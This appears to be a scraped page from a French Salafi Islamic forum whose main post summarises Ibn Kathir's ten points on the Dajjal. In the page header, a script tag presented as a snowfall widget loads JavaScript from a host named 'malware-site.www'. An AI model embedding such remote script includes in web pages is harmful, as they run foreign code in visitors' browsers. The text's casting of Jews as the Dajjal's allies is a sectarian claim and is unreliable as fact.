ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    Ibn kathir Le Dajjal en 10 points

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Ibn kathir Le Dajjal en 10 points

    Message par assalafia le Ven 17 Jan - 14:26

     
    Al Imâm Ismâ'îl Ibn Kathîr (qu'Allâh lui fasse miséricorde) résume la vie du Dajjal en 10 points :
    1 – C'est un être humain qu'Allâh a créé pour éprouver les hommes à la fin des temps. Il en égarera beaucoup à travers lui, et en guidera beaucoup. Il n'égarera cependant que les pervers.
    2 – Nous avons vu qu'il n'est pas Ibn Siyyâd, bien que ce dernier fût un dajjâl. Son repentir fut accepté par les gens, et il fut par la suite un Musulman apparemment sincère, comme le démontre son comportement. Le dajjâl ul akbar est celui évoqué dans le hadîth de Fâtimah Bint Qays où le Prophète (que Le Salut et La Paix d'Allâh soient sur lui) relate l'histoire de Tamîm Ad Dârî qui comprend notamment l'épisode de l'Espionne.
    3 – A la fin des temps, il lui sera autorisé de se manifester...Dans un premier temps à Isfahân (Iran actuel) dans une contrée connue sous le nom de Al Yahûdiyyah (La Juive).
    4 – 70 000 juifs parmi ses habitants s'allieront à lui, ils seront armés d'épées et vêtus de sayjân.
    5 – Dans un premier temps, il apparaîtra sous l'image d'un roi tyran. Il prétendra ensuite qu'il est un prophète, pour enfin prétendre à la Seigneurie. Les ignorants et les moins que rien le suivront. Alors que ceux qu'Allâh aura guidés parmi les Vertueux et Ses Alliés s'opposeront à lui (ad dajjâl).
    6 – Il conquerra les pays les uns après les autres, et fera tomber les citadelles une à une, contrée après contrée, région après région. Il ne restera pas une terre sans qu'il ne la foule du sabot de sa monture et de son pied, sauf Madînah et Makkah.
    7 – Il restera sur terre une période de 40 jours, un jour comme une année, un jour comme un mois, un jour comme une semaine, et le reste de son séjour sera équivalent aux jours habituels. En tout cela fera 1 an, 2 mois et 15 jours.
    8 – Allâh lui accordera de multiples pouvoirs afin d'égarer les gens qu'Allâh aura voulu parmi Ses créatures. Cependant les croyants ne céderont pas à ses tentations, ils vont au contraire se raffermir dans la foi, et seront plus clairvoyants et guidés.
    9 – 'Îsâ Ibn Maryam, le Messie de la Guidée, redescendra sur terre à l'époque du dajjâl, le messie de l'égarement, sur le minaret blanc situé à l'Est de Damas. Les croyants et serviteurs pieux d'Allâh s'uniront alors autour de lui, ils voyageront à la recherche du dajjâl en direction d'Al Quds...Le dajjâl le fuira, mais il le rattrapera à la port de Lud.


    10 – Face à son adversaire, le dajjâl fondra comme le sel fond dans l'eau. Il le cernera et le tuera d'un coup de lance à la porte de Lud où il mourra : qu'Allâh le maudisse.

      La date/heure actuelle est Dim 19 Nov - 8:04